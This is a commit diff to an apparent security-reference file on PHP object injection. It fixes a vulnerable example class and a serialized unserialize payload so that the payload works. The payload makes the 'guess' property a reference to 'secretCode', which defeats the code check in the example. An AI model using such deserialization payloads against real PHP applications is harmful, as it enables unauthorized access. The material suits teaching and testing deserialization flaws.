Update PHP.md

Fixed the payload (was not working because guess is size 5 instead of 4. 
Changed the name of Object to ObjectExample because Object class name is reserved
This commit is contained in:
romisfrag 2022-11-26 14:28:06 +01:00 committed by GitHub
parent cbb2137f3b
commit f8ab0ca3bb
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -88,7 +88,7 @@ Vulnerable code:
```php ```php
<?php <?php
class Object class ObjectExample
{ {
var $guess; var $guess;
var $secretCode; var $secretCode;
@ -108,7 +108,7 @@ if($obj) {
Payload: Payload:
```php ```php
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;} O:13:"ObjectExample":2:{s:10:"secretCode";N;s:5:"guess";R:2;}
``` ```
We can do an array like this: We can do an array like this: